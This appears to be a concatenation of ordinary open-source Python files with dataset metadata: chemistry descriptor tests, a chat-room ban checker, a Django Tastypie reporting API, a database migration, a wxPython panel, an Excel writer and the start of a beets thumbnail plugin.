self.__testDesc(fName,col,GraphDescriptors.Chi1v)
def testPathCounts(self):
""" FIX: this should be in some other file
"""
data = [('CCCCCC',(6,5,4,3,2,1)),
('CCC(C)CC',(6,5,5,4,1,0)),
('CC(C)CCC',(6,5,5,3,2,0)),
('CC(C)C(C)C',(6,5,6,4,0,0)),
('CC(C)(C)CC',(6,5,7,3,0,0)),
('CCCCCO',(6,5,4,3,2,1)),
('CCC(O)CC',(6,5,5,4,1,0)),
('CC(O)(C)CC',(6,5,7,3,0,0)),
('c1ccccc1O',(7,7,8,8,8,8)),
]
for smi,res in data:
m = Chem.MolFromSmiles(smi)
for i in range(1,6):
cnt = len(Chem.FindAllPathsOfLengthN(m,i,useBonds=1))
assert cnt==res[i],(smi,i,cnt,res[i],Chem.FindAllPathsOfLengthN(m,i,useBonds=1))
cnt = len(Chem.FindAllPathsOfLengthN(m,i+1,useBonds=0))
assert cnt==res[i],(smi,i,cnt,res[i],Chem.FindAllPathsOfLengthN(m,i+1,useBonds=1))
def testChi2v(self):
""" test calculation of Chi2v
"""
data = [('CCCCCC',1.707),('CCC(C)CC',1.922),('CC(C)CCC',2.183),
('CC(C)C(C)C',2.488),('CC(C)(C)CC',2.914),
('CCCCCO',1.431),('CCC(O)CC',1.470),('CC(O)(C)CC',2.166),('c1ccccc1O',1.336),
]
for smi,res in data:
m = Chem.MolFromSmiles(smi)
chi = GraphDescriptors.Chi2v(m)
assert feq(chi,res,1e-3),'mol %s (Chi2v=%f) should have Chi2V=%f'%(smi,chi,res)
def _testChi2vLong(self):
fName = 'PP_descrs_regress.rest.2.csv'
col = 12
self.__testDesc(fName,col,GraphDescriptors.Chi2v)
def testChi3v(self):
""" test calculation of Chi3v
"""
data = [('CCCCCC',0.957),('CCC(C)CC',1.394),('CC(C)CCC',0.866),('CC(C)C(C)C',1.333),('CC(C)(C)CC',1.061),
('CCCCCO',0.762),('CCC(O)CC',0.943),('CC(O)(C)CC',0.865),('c1ccccc1O',0.756)]
for smi,res in data:
m = Chem.MolFromSmiles(smi)
chi = GraphDescriptors.Chi3v(m)
assert feq(chi,res,1e-3),'mol %s (Chi3v=%f) should have Chi3V=%f'%(smi,chi,res)
def _testChi3vLong(self):
fName = 'PP_descrs_regress.rest.2.csv'
col = 14
self.__testDesc(fName,col,GraphDescriptors.Chi3v)
def testChi4v(self):
""" test calculation of Chi4v
"""
data = [('CCCCCC',0.500),('CCC(C)CC',0.289),('CC(C)CCC',0.577),
('CC(C)C(C)C',0.000),('CC(C)(C)CC',0.000),
('CCCCCO',0.362),('CCC(O)CC',0.289),('CC(O)(C)CC',0.000),('c1ccccc1O',0.428)]
for smi,res in data:
m = Chem.MolFromSmiles(smi)
chi = GraphDescriptors.Chi4v(m)
assert feq(chi,res,1e-3),'mol %s (Chi4v=%f) should have Chi4V=%f'%(smi,chi,res)
def testChi5v(self):
""" test calculation of Chi5v
"""
data = [('CCCCCC',0.250),('CCC(C)CC',0.000),('CC(C)CCC',0.000),
('CC(C)C(C)C',0.000),('CC(C)(C)CC',0.000),
('CCCCCO',0.112),('CCC(O)CC',0.000),('CC(O)(C)CC',0.000),('c1ccccc1O',0.242)]
for smi,res in data:
m = Chem.MolFromSmiles(smi)
chi = GraphDescriptors.ChiNv_(m,5)
assert feq(chi,res,1e-3),'mol %s (Chi5v=%f) should have Chi5V=%f'%(smi,chi,res)
def testChi0n(self):
""" test calculation of Chi0n
"""
data = [('CCCCCC',4.828),('CCC(C)CC',4.992),('CC(C)CCC',4.992),
('CC(C)C(C)C',5.155),('CC(C)(C)CC',5.207),
('CCCCCO',4.276),('CCC(O)CC',4.439),('CC(O)(C)CC',4.654),('c1ccccc1O',3.834),
('CCCl',2.085),('CCBr',2.085),('CCI',2.085),]
for smi,res in data:
m = Chem.MolFromSmiles(smi)
chi = GraphDescriptors.Chi0n(m)
assert feq(chi,res,1e-3),'mol %s (Chi0n=%f) should have Chi0n=%f'%(smi,chi,res)
def _testChi0nLong(self):
fName = 'PP_descrs_regress.rest.2.csv'
col = 6
self.__testDesc(fName,col,GraphDescriptors.Chi0n)
def testChi1n(self):
""" test calculation of Chi1n
"""
data = [('CCCCCC',2.914),('CCC(C)CC',2.808),('CC(C)CCC',2.770),
('CC(C)C(C)C',2.643),('CC(C)(C)CC',2.561),
('CCCCCO',2.523),('CCC(O)CC',2.489),('CC(O)(C)CC',2.284),('c1ccccc1O',2.134)]
for smi,res in data:
m = Chem.MolFromSmiles(smi)
chi = GraphDescriptors.Chi1n(m)
assert feq(chi,res,1e-3),'mol %s (Chi1n=%f) should have Chi1N=%f'%(smi,chi,res)
def _testChi1nLong(self):
fName = 'PP_descrs_regress.rest.2.csv'
col = 9
self.__testDesc(fName,col,GraphDescriptors.Chi1n)
def testChi2n(self):
""" test calculation of Chi2n
"""
data = [('CCCCCC',1.707),('CCC(C)CC',1.922),('CC(C)CCC',2.183),
('CC(C)C(C)C',2.488),('CC(C)(C)CC',2.914),
('CCCCCO',1.431),('CCC(O)CC',1.470),('CC(O)(C)CC',2.166),('c1ccccc1O',1.336)]
for smi,res in data:
m = Chem.MolFromSmiles(smi)
chi = GraphDescriptors.Chi2n(m)
assert feq(chi,res,1e-3),'mol %s (Chi2n=%f) should have Chi2N=%f'%(smi,chi,res)
def _testChi2nLong(self):
fName = 'PP_descrs_regress.rest.2.csv'
col = 11
self.__testDesc(fName,col,GraphDescriptors.Chi2n)
def testChi3n(self):
""" test calculation of Chi3n
"""
data = [('CCCCCC',0.957),('CCC(C)CC',1.394),('CC(C)CCC',0.866),('CC(C)C(C)C',1.333),('CC(C)(C)CC',1.061),
('CCCCCO',0.762),('CCC(O)CC',0.943),('CC(O)(C)CC',0.865),('c1ccccc1O',0.756)]
for smi,res in data:
m = Chem.MolFromSmiles(smi)
chi = GraphDescriptors.Chi3n(m)
assert feq(chi,res,1e-3),'mol %s (Chi3n=%f) should have Chi3N=%f'%(smi,chi,res)
def _testChi3nLong(self):
fName = 'PP_descrs_regress.rest.2.csv'
col = 13
self.__testDesc(fName,col,GraphDescriptors.Chi3n)
def testChi4n(self):
""" test calculation of Chi4n
"""
data = [('CCCCCC',0.500),('CCC(C)CC',0.289),('CC(C)CCC',0.577),
('CC(C)C(C)C',0.000),('CC(C)(C)CC',0.000),
('CCCCCO',0.362),('CCC(O)CC',0.289),('CC(O)(C)CC',0.000),('c1ccccc1O',0.428)]
for smi,res in data:
m = Chem.MolFromSmiles(smi)
chi = GraphDescriptors.Chi4n(m)
assert feq(chi,res,1e-3),'mol %s (Chi4n=%f) should have Chi4N=%f'%(smi,chi,res)
def testIssue125(self):
""" test an issue with calculating BalabanJ
"""
smi = 'O=C(OC)C1=C(C)NC(C)=C(C(OC)=O)C1C2=CC=CC=C2[N+]([O-])=O'
m1 = Chem.MolFromSmiles(smi)
m2 = Chem.MolFromSmiles(smi)
Chem.MolToSmiles(m1)
j1=GraphDescriptors.BalabanJ(m1)
j2=GraphDescriptors.BalabanJ(m2)
assert feq(j1,j2)
def testOrderDepend(self):
""" test order dependence of some descriptors:
"""
data = [('C=CC=C',21.01955,2.73205),
('O=CC=O',25.01955,2.73205),
('FCC(=O)CF',46.7548875,2.98816),
('O=C1C=CC(=O)C=C1',148.705216,2.8265),
('C12C(F)=C(O)C(F)C1C(F)=C(O)C(F)2',315.250442,2.4509),
('C12CC=CCC1C(=O)C3CC=CCC3C(=O)2',321.539522,1.95986)]
for smi,CT,bal in data:
m = Chem.MolFromSmiles(smi)
newBal = GraphDescriptors.BalabanJ(m, forceDMat = 1)
assert feq(newBal,bal,1e-4),'mol %s %f!=%f'%(smi,newBal,bal)
m = Chem.MolFromSmiles(smi)
newCT = GraphDescriptors.BertzCT(m, forceDMat = 1)
assert feq(newCT,CT,1e-4),'mol %s (CT calc = %f) should have CT = %f'%(smi,newCT,CT)
m = Chem.MolFromSmiles(smi)
newCT = GraphDescriptors.BertzCT(m, forceDMat = 1)
assert feq(newCT,CT,1e-4),'mol %s (CT calc = %f) should have CT = %f'%(smi,newCT,CT)
newBal = GraphDescriptors.BalabanJ(m, forceDMat = 1)
assert feq(newBal,bal,1e-4),'mol %s %f!=%f'%(smi,newBal,bal)
m = Chem.MolFromSmiles(smi)
newBal = GraphDescriptors.BalabanJ(m, forceDMat = 1)
assert feq(newBal,bal,1e-4),'mol %s %f!=%f'%(smi,newBal,bal)
newCT = GraphDescriptors.BertzCT(m, forceDMat = 1)
assert feq(newCT,CT,1e-4),'mol %s (CT calc = %f) should have CT = %f'%(smi,newCT,CT)
if __name__ == '__main__':
import sys,getopt,re
doLong=0
if len(sys.argv) >1:
args,extras=getopt.getopt(sys.argv[1:],'l')
for arg,val in args:
if arg=='-l':
doLong=1
sys.argv.remove('-l')
if doLong:
for methName in dir(TestCase):
if re.match('_test',methName):
newName = re.sub('_test','test',methName)
exec('TestCase.%s = TestCase.%s'%(newName,methName))
unittest.main()
|
bsd-3-clause
| -2,990,828,470,993,036,300 | 30.829649 | 302 | 0.57981 | false |
nortxort/tinybot-rtc
|
check_user.py
|
1
|
3452
|
class CheckUser:
"""
A class to perform various ban checks on a User object.
The checks will be done, against the different ban lists
and other ban rules in the config file.
If a test is True, then the user will be banned.
"""
def __init__(self, tinybot, user, conf):
"""
Initialize the CheckUser class.
:param tinybot: An instance of TinychatBot.
:type tinybot: TinychatBot
:param user: The User object to check.
:type user: User
:param conf: The config file.
:type conf: config
"""
self.tinybot = tinybot
self.user = user
self.config = conf
def check_account(self):
"""
Check if the user account is in the account bans list.
:return: True, if the user was banned.
:rtype: bool
"""
if self.user.account in self.config.B_ACCOUNT_BANS:
if self.config.B_USE_KICK_AS_AUTOBAN:
self.tinybot.send_kick_msg(self.user.id)
else:
self.tinybot.send_ban_msg(self.user.id)
if self.config.B_USE_KICK_AS_AUTOBAN:
self.tinybot.send_chat_msg('Auto-Kicked: (bad account)')
else:
self.tinybot.send_chat_msg('Auto-Banned: (bad account)')
return True
return False
def guest_entry(self):
"""
Check if the user is a guest, and allowed to join.
:return: True, if the user was banned.
:rtype: bool
"""
if self.user.account == '' and not self.config.B_ALLOW_GUESTS:
if self.config.B_USE_KICK_AS_AUTOBAN:
self.tinybot.send_kick_msg(self.user.id)
else:
self.tinybot.send_ban_msg(self.user.id)
if self.config.B_USE_KICK_AS_AUTOBAN:
self.tinybot.send_chat_msg('Auto-Kicked: (guests not allowed)')
else:
self.tinybot.send_chat_msg('Auto-Banned: (guests not allowed)')
return True
return False
def check_nick(self):
"""
Check if the user's nick is in the nick bans list.
:return: True, if the user was banned.
:rtype: bool
"""
if self.user.nick in self.config.B_NICK_BANS:
if self.config.B_USE_KICK_AS_AUTOBAN:
self.tinybot.send_kick_msg(self.user.id)
else:
self.tinybot.send_ban_msg(self.user.id)
if self.config.B_USE_KICK_AS_AUTOBAN:
self.tinybot.send_chat_msg('Auto-Kicked: (bad nick)')
else:
self.tinybot.send_chat_msg('Auto-Banned: (bad nick)')
return True
return False
def check_lurker(self):
"""
Check if the user is a lurker, and allowed to join.
:return: True, if the user was banned.
:rtype: bool
"""
if self.user.is_lurker and not self.config.B_ALLOW_LURKERS:
if self.config.B_USE_KICK_AS_AUTOBAN:
self.tinybot.send_kick_msg(self.user.id)
else:
self.tinybot.send_ban_msg(self.user.id)
if self.config.B_USE_KICK_AS_AUTOBAN:
self.tinybot.send_chat_msg('Auto-Kicked: (lurkers not allowed)')
else:
self.tinybot.send_chat_msg('Auto-Banned: (lurkers not allowed)')
return True
return False
|
mit
| -4,520,653,867,858,702,300 | 28.504274 | 80 | 0.550985 | false |
fraunhoferfokus/fixmycity
|
api/tasty.py
|
1
|
10043
|
'''
/*******************************************************************************
*
* Copyright (c) 2015 Fraunhofer FOKUS, All rights reserved.
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 3.0 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library. If not, see <http://www.gnu.org/licenses/>.
*
* AUTHORS: Louay Bassbouss (louay.bassbouss@fokus.fraunhofer.de)
*
******************************************************************************/
'''
from django.contrib.auth.models import User
from django.core.exceptions import MultipleObjectsReturned, ObjectDoesNotExist
from tastypie import fields
from tastypie.utils import trailing_slash, dict_strip_unicode_keys
from tastypie.http import HttpGone, HttpMultipleChoices
from tastypie.authentication import Authentication
from tastypie.authorization import Authorization
from django.conf.urls.defaults import url
from tastypie.resources import ModelResource, ALL, ALL_WITH_RELATIONS
from tastypie.cache import SimpleCache
import api.models
class ReportResource(ModelResource):
user = fields.ToOneField('api.tasty.UserResource', 'user', full=True)
status = fields.ToOneField('api.tasty.StatusResource', 'status', full=True)
category = fields.ToOneField('api.tasty.CategoryResource', 'category', full=True)
address = fields.ToOneField('api.tasty.AddressResource', 'address', full=True)
comments = fields.ToManyField('api.tasty.CommentResource', 'comment_set', related_name='report', blank=True)
ratings = fields.ToManyField('api.tasty.RatingResource', 'rating_set', related_name='report', blank=True)
photos = fields.ToManyField('api.tasty.PhotoResource', 'photo_set', related_name='report', blank=True, full=True)
class Meta:
resource_name = 'reports'
queryset = api.models.Report.objects.all()
authentication = Authentication()
authorization = Authorization()
list_allowed_methods = ['get', 'post']
detail_allowed_methods = ['get', 'post', 'put', 'delete'] # no 'patch'
always_return_data = True # XXX
#cache = SimpleCache()
filtering = {
'user': ALL_WITH_RELATIONS,
'status': ALL_WITH_RELATIONS,
'photos': ALL_WITH_RELATIONS,
'tags': ['icontains'],
'address': ALL_WITH_RELATIONS,
'category': ALL_WITH_RELATIONS,
'creationTime': ['exact', 'range', 'lt', 'lte', 'gte', 'gt'],
}
ordering = ['id', 'creationTime']
def build_filters(self, filters={}):
"""Add custom filters (radius, onlyWithPhotos)"""
orm_filters = super(ReportResource, self).build_filters(filters)
# filter by photos
photos = api.models.Photo.objects.all()
try:
if int(filters.get('onlyWithPhotos')) == 1:
orm_filters['pk__in'] = set([p.report.pk for p in photos])
except:
pass
# filter by distance
try:
lat = float(filters.get('latitude'))
lng = float(filters.get('longitude'))
rad = float(filters.get('radius'))
reports = api.models.Report.objects.nearby(lat, lng, rad)
pks = [r.pk for r in reports]
try:
orm_filters['pk__in'] = orm_filters['pk__in'].intersection(pks)
except:
orm_filters['pk__in'] = pks
except:
pass
return orm_filters
def obj_create(self, bundle, request=None, **kwargs):
return super(ReportResource, self).obj_create(bundle, request,
user=request.user)
def hydrate_address(self, bundle):
resrc = AddressResource()
addr = dict((k[5:], v) for k,v in bundle.data.iteritems() \
if k.startswith('addr_'))
geo = dict((k[4:], float(v)) for k,v in bundle.data.iteritems() \
if k.startswith('geo_'))
addr.update(geo)
addrbundle = resrc.build_bundle(obj=api.models.Address,
data=dict_strip_unicode_keys(addr))
addrobj = resrc.obj_create(addrbundle).obj
bundle.obj.address = addrobj
return bundle
def dehydrate(self, bundle):
"""
Calculate averageRating and append to response bundle.
"""
total_score = 0.0
ratings = api.models.Rating.objects.filter(report__id=bundle.obj.id)
if not ratings.count():
return bundle
for rating in ratings:
total_score += rating.value
bundle.data['averageRating'] = total_score / ratings.count()
return bundle
def dehydrate_description(self, bundle):
#return bundle.data['description'].upper()
return bundle.data['description'] # do nothing
# nested resources
# ref: latest/cookbook.html#nested-resources
def override_urls(self):
return [
url(r"^reports/(?P<pk>\d+)/(?P<nest_resource>\w+)%s$" \
% trailing_slash(), self.wrap_view('handle_nested'),
name='api_handle_nested'),
]
def handle_nested(self, request, **kwargs):
resource_name = kwargs.pop('nest_resource')
resource = self.fields[resource_name].to_class().__class__
try:
stripped_kwargs = self.remove_api_resource_names(kwargs)
obj = self.cached_obj_get(request=request, **stripped_kwargs)
except ObjectDoesNotExist:
return HttpGone()
except MultipleObjectsReturned:
return HttpMultipleChoices('Multiple objects with this PK.')
r = resource()
if request.method.lower() == 'get':
return r.get_list(request, report=obj.pk)
elif request.method.lower() == 'post':
cont_type = request.META.get('CONTENT_TYPE', 'application/json')
deserialized = r.deserialize(request, format=cont_type)
report_uri = ReportResource().get_resource_uri(obj)
user_uri = UserResource().get_resource_uri(request.user)
parms = {'report': report_uri, 'user': user_uri}
if 'form' in cont_type:
deserialized = dict(
(str(k), v[0] if (type(v)==list and len(v)>0) else v) \
for k, v in deserialized.iteritems())
parms.update(deserialized)
try:
bundle = r.build_bundle(
data=dict_strip_unicode_keys(parms),
request=request
)
r.is_valid(bundle, request)
r.obj_create(bundle) # this creates the actual child
except:
raise ValueError(parms)
bundle_dehyd = r.full_dehydrate(bundle);
resp = r.create_response(request, bundle_dehyd)
resp['location'] = r.get_resource_uri(bundle)
resp.status_code = 201
return resp
else:
raise NotImplementedError('In POST and GET we trust.')
class UserResource(ModelResource):
class Meta:
resource_name = 'users'
queryset = User.objects.all()
excludes = ['email', 'password', 'is_active', 'last_login',
'first_name', 'last_name',
'date_joined', 'is_staff', 'is_superuser']
allowed_methods = ['get']
#cache = SimpleCache()
filtering = { 'username': ALL, }
ordering = ['username', 'id']
class StatusResource(ModelResource):
class Meta:
resource_name = 'statuses'
queryset = api.models.Status.objects.all()
#cache = SimpleCache()
class CategoryResource(ModelResource):
class Meta:
resource_name = 'categories'
queryset = api.models.Category.objects.all()
#cache = SimpleCache()
class AddressResource(ModelResource):
class Meta:
queryset = api.models.Address.objects.all()
excludes = ['id']
#cache = SimpleCache()
class CommentResource(ModelResource):
report = fields.ToOneField('api.tasty.ReportResource', 'report')
user = fields.ToOneField(UserResource, 'user', full=True)
newStatus = fields.ToOneField(StatusResource, 'newStatus', full=True,
blank=True, null=True)
class Meta:
resource_name = 'comments'
queryset = api.models.Comment.objects.all()
authentication = Authentication()
authorization = Authorization()
#cache = SimpleCache()
filtering = {
'report': ALL,
'user': ALL_WITH_RELATIONS,
}
ordering = ['creationTime', 'newStatus', 'user', 'report', 'id']
class RatingResource(ModelResource):
report = fields.ToOneField('api.tasty.ReportResource', 'report')
user = fields.ToOneField(UserResource, 'user', full=True)
class Meta:
resource_name = 'ratings'
queryset = api.models.Rating.objects.all()
#cache = SimpleCache()
filtering = {
'report': ALL,
'user': ALL_WITH_RELATIONS,
}
class PhotoResource(ModelResource):
report = fields.ToOneField('api.tasty.ReportResource', 'report')
user = fields.ToOneField(UserResource, 'user')
class Meta:
resource_name = 'photos'
queryset = api.models.Photo.objects.all()
#cache = SimpleCache()
filtering = {
'report': ALL,
}
|
lgpl-3.0
| 2,120,749,673,092,615,000 | 36.755639 | 122 | 0.588967 | false |
cernvm/cvmfs-monitor
|
cvmfsweb/cvmfsmon/migrations/0001_initial.py
|
1
|
4140
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Stratum'
db.create_table('cvmfsmon_stratum', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=100)),
('url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('alias', self.gf('django.db.models.fields.CharField')(max_length=20)),
('level', self.gf('django.db.models.fields.IntegerField')()),
))
db.send_create_signal('cvmfsmon', ['Stratum'])
# Adding unique constraint on 'Stratum', fields ['alias', 'level']
db.create_unique('cvmfsmon_stratum', ['alias', 'level'])
# Adding model 'Repository'
db.create_table('cvmfsmon_repository', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=100)),
('fqrn', self.gf('django.db.models.fields.CharField')(max_length=100)),
('project_url', self.gf('django.db.models.fields.URLField')(max_length=255, blank=True)),
('project_description', self.gf('django.db.models.fields.TextField')(blank=True)),
('stratum0', self.gf('django.db.models.fields.related.ForeignKey')(related_name='stratum0', to=orm['cvmfsmon.Stratum'])),
))
db.send_create_signal('cvmfsmon', ['Repository'])
# Adding M2M table for field stratum1s on 'Repository'
m2m_table_name = db.shorten_name('cvmfsmon_repository_stratum1s')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('repository', models.ForeignKey(orm['cvmfsmon.repository'], null=False)),
('stratum', models.ForeignKey(orm['cvmfsmon.stratum'], null=False))
))
db.create_unique(m2m_table_name, ['repository_id', 'stratum_id'])
def backwards(self, orm):
# Removing unique constraint on 'Stratum', fields ['alias', 'level']
db.delete_unique('cvmfsmon_stratum', ['alias', 'level'])
# Deleting model 'Stratum'
db.delete_table('cvmfsmon_stratum')
# Deleting model 'Repository'
db.delete_table('cvmfsmon_repository')
# Removing M2M table for field stratum1s on 'Repository'
db.delete_table(db.shorten_name('cvmfsmon_repository_stratum1s'))
models = {
'cvmfsmon.repository': {
'Meta': {'object_name': 'Repository'},
'fqrn': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'project_description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'project_url': ('django.db.models.fields.URLField', [], {'max_length': '255', 'blank': 'True'}),
'stratum0': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'stratum0'", 'to': "orm['cvmfsmon.Stratum']"}),
'stratum1s': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'stratum1s'", 'symmetrical': 'False', 'to': "orm['cvmfsmon.Stratum']"})
},
'cvmfsmon.stratum': {
'Meta': {'unique_together': "(('alias', 'level'),)", 'object_name': 'Stratum'},
'alias': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.IntegerField', [], {}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
}
}
complete_apps = ['cvmfsmon']
|
bsd-2-clause
| 3,032,668,471,992,999,400 | 50.7625 | 170 | 0.595652 | false |
rwspicer/ARDA
|
arda_db/browser/migrations/0004_auto_20150320_0322.py
|
1
|
1718
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('browser', '0003_auto_20150320_0253'),
]
operations = [
migrations.CreateModel(
name='ROnline',
fields=[
('resource_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='browser.Resource')),
('otype', models.CharField(max_length=1, choices=[(b'0', b'video'), (b'1', b'article'), (b'2', b'web site')])),
('date', models.DateTimeField()),
('url', models.TextField(blank=True)),
],
options={
},
bases=('browser.resource',),
),
migrations.CreateModel(
name='SServices',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('diagnostic', models.BooleanField(default=False)),
('resource', models.BooleanField(default=False)),
('therapy', models.BooleanField(default=False)),
('educational', models.BooleanField(default=False)),
('referral', models.BooleanField(default=False)),
('legal', models.BooleanField(default=False)),
('city', models.CharField(max_length=30)),
('resourceLink', models.ForeignKey(to='browser.Resource')),
],
options={
},
bases=(models.Model,),
),
migrations.DeleteModel(
name='SService',
),
]
|
mit
| 5,817,100,351,531,621,000 | 36.347826 | 150 | 0.532014 | false |
RobinQuetin/CAIRIS-web
|
cairis/cairis/ConceptReferencePanel.py
|
1
|
2828
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import wx
import armid
from BasePanel import BasePanel
import ConceptReference
from Borg import Borg
class ConceptReferencePanel(BasePanel):
def __init__(self,parent):
BasePanel.__init__(self,parent,armid.CONCEPTREFERENCE_ID)
self.theId = None
b = Borg()
self.dbProxy = b.dbProxy
def buildControls(self,isCreate,isUpdateable=True):
mainSizer = wx.BoxSizer(wx.VERTICAL)
mainSizer.Add(self.buildTextSizer('Name',(87,30),armid.CONCEPTREFERENCE_TEXTNAME_ID),0,wx.EXPAND)
dims = ['asset','attacker','countermeasure','domainproperty','environment','goal','misusecase','obstacle','persona','requirement','response','risk','role','task','threat','vulnerability']
mainSizer.Add(self.buildComboSizerList('Concept',(87,30),armid.CONCEPTREFERENCE_COMBODIMNAME_ID,dims),0,wx.EXPAND)
mainSizer.Add(self.buildComboSizerList('Object',(87,30),armid.CONCEPTREFERENCE_COMBOOBJTNAME_ID,[]),0,wx.EXPAND)
mainSizer.Add(self.buildMLTextSizer('Description',(87,30),armid.CONCEPTREFERENCE_TEXTDESCRIPTION_ID),1,wx.EXPAND)
mainSizer.Add(self.buildCommitButtonSizer(armid.CONCEPTREFERENCE_BUTTONCOMMIT_ID,isCreate),0,wx.CENTER)
wx.EVT_COMBOBOX(self,armid.CONCEPTREFERENCE_COMBODIMNAME_ID,self.onDimensionChange)
self.SetSizer(mainSizer)
def loadControls(self,objt,isReadOnly=False):
self.theId = objt.id()
nameCtrl = self.FindWindowById(armid.CONCEPTREFERENCE_TEXTNAME_ID)
dimCtrl = self.FindWindowById(armid.CONCEPTREFERENCE_COMBODIMNAME_ID)
objtCtrl = self.FindWindowById(armid.CONCEPTREFERENCE_COMBOOBJTNAME_ID)
descCtrl = self.FindWindowById(armid.CONCEPTREFERENCE_TEXTDESCRIPTION_ID)
nameCtrl.SetValue(objt.name())
dimCtrl.SetValue(objt.dimension())
objtCtrl.SetValue(objt.objectName())
descCtrl.SetValue(objt.description())
def onDimensionChange(self,evt):
dimName = evt.GetString()
objts = self.dbProxy.getDimensionNames(dimName)
objtCtrl = self.FindWindowById(armid.CONCEPTREFERENCE_COMBOOBJTNAME_ID)
objtCtrl.SetItems(objts)
|
apache-2.0
| -7,756,544,276,121,583,000 | 46.133333 | 191 | 0.762023 | false |
EclipseXuLu/DataHouse
|
DataHouse/crawler/file_helper.py
|
1
|
1669
|
import logging
import os
from openpyxl import Workbook
logging.basicConfig(format='%(levelname)s:%(asctime)s:%(message)s \t', level=logging.INFO)
EXCEL_DIR = '/home/lucasx/PycharmProjects/DataHouse/DataSet/'
def write_excel(list_, filename):
mkdirs_if_not_exists(EXCEL_DIR)
wb = Workbook()
ws = wb.active
ws.title = "HouseInfo"
ws.cell(row=1, column=1).value = 'address'
ws.cell(row=1, column=2).value = 'area'
ws.cell(row=1, column=3).value = 'block'
ws.cell(row=1, column=4).value = 'buildYear'
ws.cell(row=1, column=5).value = 'image'
ws.cell(row=1, column=6).value = 'midPrice'
ws.cell(row=1, column=7).value = 'name'
ws.cell(row=1, column=8).value = 'saleNum'
ws.cell(row=1, column=9).value = 'url'
rownum = 2
for each_item in list_:
ws.cell(row=rownum, column=1).value = each_item.address
ws.cell(row=rownum, column=2).value = each_item.area
ws.cell(row=rownum, column=3).value = each_item.block
ws.cell(row=rownum, column=4).value = each_item.buildYear
ws.cell(row=rownum, column=5).value = each_item.image
ws.cell(row=rownum, column=6).value = each_item.midPrice
ws.cell(row=rownum, column=7).value = each_item.name
ws.cell(row=rownum, column=8).value = each_item.saleNum
ws.cell(row=rownum, column=9).value = each_item.url
rownum += 1
wb.save(EXCEL_DIR + filename + '.xlsx')
logging.info('Excel生成成功!')
def mkdirs_if_not_exists(directory_):
"""create a new folder if it does not exist"""
if not os.path.exists(directory_) or not os.path.isdir(directory_):
os.makedirs(directory_)
|
mit
| -5,800,700,881,441,562,000 | 35.911111 | 91 | 0.646598 | false |
SusannaMaria/beets
|
beetsplug/thumbnails.py
|
1
|
10439
|
# -*- coding: utf-8 -*-
# This file is part of beets.
# Copyright 2016, Bruno Cauet
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Create freedesktop.org-compliant thumbnails for album folders
This plugin is POSIX-only.
Spec: standards.freedesktop.org/thumbnail-spec/latest/index.html
"""
from __future__ import division, absolute_import, print_function
from hashlib import md5
import os
import shutil
from itertools import chain
from pathlib import PurePosixPath
import ctypes
import ctypes.util
from xdg import BaseDirectory
from beets.plugins import BeetsPlugin
from beets.ui import Subcommand, decargs
from beets import util
from beets.util.artresizer import ArtResizer, get_im_version, get_pil_version
import six
BASE_DIR = os.path.join(BaseDirectory.xdg_cache_home, "thumbnails")
NORMAL_DIR = util.bytestring_path(os.path.join(BASE_DIR, "normal"))
LARGE_DIR = util.bytestring_path(os.path.join(BASE_DIR, "large"))
class ThumbnailsPlugin(BeetsPlugin):
def __init__(self):
super(ThumbnailsPlugin, self).__init__()
self.config.add({
'auto': True,
'force': False,
'dolphin': False,
})
self.write_metadata = None
if self.config['auto'] and self._check_local_ok():
self.register_listener('art_set', self.process_album)
def commands(self):
thumbnails_command = Subcommand("thumbnails",
help=u"Create album thumbnails")
thumbnails_command.parser.add_option(
u'-f', u'--force',
dest='force', action='store_true', default=False,
help=u'force regeneration of thumbnails deemed fine (existing & '
u'recent enough)')
thumbnails_command.parser.add_option(
u'--dolphin', dest='dolphin', action='store_true', default=False,
help=u"create Dolphin-compatible thumbnail information (for KDE)")
